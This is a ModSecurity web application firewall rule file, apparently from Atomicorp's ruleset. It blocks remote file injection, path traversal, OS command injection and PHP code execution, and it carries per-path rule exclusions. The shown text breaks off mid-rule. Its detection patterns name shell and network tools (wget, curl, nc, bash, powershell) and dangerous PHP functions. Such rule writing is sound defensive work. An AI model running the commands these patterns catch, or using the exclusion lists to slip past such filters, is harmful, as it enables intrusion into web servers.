SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:sql|!ARGS:address_whois "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340742,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:sql|!ARGS:address_whois "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340743,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91336

SecRule REQUEST_FILENAME "/search_results\.php" "phase:2,id:91337,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91338,t:none,pass,nolog,skipAfter:END_RULES_91338"

SecRule ARGS|!ARGS:server_protocol|!ARGS:databasehost|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:act "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:341744,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:server_protocol|!ARGS:databasehost|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:act "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341745,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91338

SecRule REQUEST_FILENAME "/wp-content/plugins/wordtube/lib/statistic\.php" "phase:2,id:91339,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91340,t:none,pass,nolog,skipAfter:END_RULES_91340"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340746,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340747,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91340

SecRule REQUEST_FILENAME "/paadmin/categories\.php" "phase:2,id:91341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380011"

SecRule REQUEST_FILENAME "/alt_clickmenu\.php" "phase:2,id:91342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/get\.php" "phase:2,id:91343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/admin-ajax\.php" "phase:2,id:91344,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=390703,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340158,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=340018,ctl:ruleRemovebyID=390708,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
SecAction "phase:2,id:91345,t:none,pass,nolog,skipAfter:END_RULES_91345"



# Rule 340029: script, perl, etc. code
SecRule REQUEST_URI|ARGS|!ARGS:/thumbnail/|!ARGS:image|!ARGS:screenshot_png|!ARGS:/^acf/|!ARGS:fileContent|!ARGS:/_edit_/|!ARGS:/details/|!ARGS:/block_value/|!ARGS:/News/|!ARGS:/products_/|!ARGS:/article/|!ARGS:/template/|!ARGS:editor1|!ARGS:prefix|!ARGS:suffix|!ARGS:/info/|!ARGS:payment_extrainfo|!ARGS:file|!ARGS:thecode|!ARGS:/chat/|!ARGS:snippet|!ARGS:/phpcode/|!ARGS:intro|!ARGS:/title/|!ARGS:/data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:/content/|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:ibsf|!ARGS:/disallowed/ "(?:;|/|\| )(?:\b(?:cat|ls|perl|uname|pwd|cp|tclsh8?|cpp|f(?:etch|tp)|python|chown|rm|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|r?(?:b|d)ash|t?c?sh|telnet|clang|nc)\b |\b(?:sleep|benchmark)\b \(? ?[0-9]|powershell -w|\bkill(?: (?:[0-9]|-)|all\ ))" 	"log,auditlog,phase:2,deny,log,status:403,capture,id:360029,t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceNulls,t:cmdLine,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked - command in REQUEST_URI or Argument',logdata:'%{TX.0}'"


# Rule 340006: generic recursion signatures
SecRule REQUEST_FILENAME|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|ARGS|!ARGS:Answer|!ARGS:site_details|!ARGS:/ultra_/|!ARGS:/icon/|!ARGS:Inhalt|!ARGS:/fields_prev/|!ARGS:Details|!ARGS:Lead|!ARGS:changes|!ARGS:/editfile/|!ARGS:thecode|!ARGS:/sourcedir/|!ARGS:elm1|!ARGS:/EditorZone/|!ARGS:file_private_path|!ARGS:/form_data/|!ARGS:code|!ARGS:/^wpm_o_plugin/|!ARGS:/^jform/|!ARGS:/^resp/|!ARGS:rpath|!ARGS:data|!ARGS:/template/|!ARGS:/content/|!ARGS:/sidebar/|!ARGS:editor1|!ARGS:resolution|!ARGS:/logo/|!ARGS:/^style_options/|!ARGS:manager_image_path|!ARGS:prefix|!ARGS:suffix|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:/desc/|!ARGS:videoplayer|!ARGS:css_data|!ARGS:/txt/|!ARGS:/body/|!ARGS:wysiwyg_input|!ARGS:backPath|!ARGS:/text/|!ARGS:/message/|!ARGS:/^fck_/|!ARGS:htmlSource|!ARGS:path_to_lzx|!ARGS:trk|!ARGS:advHTMLEdit1|!ARGS:modules "\.\./\.\./"  	"deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,capture,id:347006,phase:2,rev:69,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"

SecRule REQUEST_URI|ARGS|!ARGS:site_details|!ARGS:content|!ARGS:res|!ARGS:/autosave/|!ARGS:/css/|!ARGS:/^widget-my_requestquotewidget/|!ARGS:/wp_autosave/|!ARGS:po|!ARGS:modules "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))" 	"deny,status:403,phase:2,log,auditlog,t:none,t:lowercase,id:340748,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied'"

SecMarker END_RULES_91345

SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:91346,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=390620,ctl:ruleRemovebyID=340077,ctl:ruleRemovebyID=380011,ctl:ruleRemovebyID=380012,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854"
SecAction "phase:2,id:91347,t:none,pass,nolog,skipAfter:END_RULES_91347"

SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:templatecode|!ARGS:areas "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,capture,chain,id:342128,rev:21,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/code/|!ARGS:areas|!ARGS:file|!ARGS:/script/|!ARGS:description|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:solution|!ARGS:problem|!ARGS:view|!ARGS:/^body/|!ARGS:payment_extrainfo|!ARGS:server_validation|!ARGS:solution|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/|!ARGS:/jform/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|str_rot13|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+|base64_decode|base64_url_decode|decode_base64) ?(?:\(|\: ?'?)|system\( ?getenv ?\( ?http_php|(?:fputs|fread) ?\(|chr ?\(.{1,255}\).chr ?\(.{1,255}\).chr\()"  "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase"

SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_(?:ganalytics|install|config&tmpl|easyblog|form2content))" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,id:336142,rev:13,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
SecRule REQUEST_URI|ARGS|!ARGS:state|!ARGS:ix0|!ARGS:/source_code/|!ARGS:/location/|!ARGS:/coupon/|!ARGS:alias|!ARGS:forSale_path|!ARGS:login|!ARGS:/^m2u/|!ARGS:misc|!ARGS:gallerylist|!ARGS:pathubr_upload|!ARGS:custom_email|!ARGS:extra_info|!ARGS:/source_code/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:marker|!ARGS:marker_select|!ARGS:conf_DOWNLOADROOT|!ARGS:/custom_field/|!ARGS:search_all|!ARGS:/^zcck/|!ARGS:/^tzfields/|!ARGS:contact_info|!ARGS:log_path|!ARGS:tmp_path|!ARGS:pathadmin|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:/video/|!ARGS:/biography/|!ARGS:/sermon/|!ARGS:notes|!ARGS:competitor|!ARGS:/^currentValue/|!ARGS:protocol_select|!ARGS:/constant_contact/|!ARGS:/^plugin/|!ARGS:/^params/|!ARGS:extern_file|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:textfetch|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/linkedin/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:service|!ARGS:want2Read|!ARGS:search_string|!ARGS:/preview/|!ARGS:/thumb/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:email_forward|!ARGS:bannercode|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:Stream|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:short_story|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:basehref|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "t:none,t:urlDecodeUni,t:lowercase,multimatch,chain"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"

SecRule REQUEST_URI "!(^/administrator/index\.php\?option=com_(?:ganalytics|install|config|easyblog|form2content))"          "phase:2,deny,log,auditlog,status:403,capture,id:336141,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:13,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
SecRule ARGS|!ARGS:misc|!ARGS:ix0|!ARGS:state|!ARGS:/source_code/|!ARGS:alias|!ARGS:/coupon/|!ARGS:/location/|!ARGS:forSale_path|!ARGS:login|!ARGS:/^m2u/|!ARGS:pathubr_upload|!ARGS:gallerylist|!ARGS:junkWords|!ARGS:extra_info|!ARGS:custom_email|!ARGS:name_ip|!ARGS:/source_code/|!ARGS:search_all|!ARGS:/stream/|!ARGS:marker|!ARGS:marker_select|!ARGS:conf_DOWNLOADROOT|!ARGS:/custom_field/|!ARGS:/^zcck/|!ARGS:log_path|!ARGS:/^tzfields/|!ARGS:contact_info|!ARGS:tmp_path|!ARGS:pathadmin|!ARGS:canonical|!ARGS:/addy/|!ARGS:/sermon/|!ARGS:/video/|!ARGS:/biography/|!ARGS:notes|!ARGS:competitor|!ARGS:/^currentValue/|!ARGS:protocol_select|!ARGS:/constant_contact/|!ARGS:/^plugin/|!ARGS:/^params/|!ARGS:extern_file|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:textfetch|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARG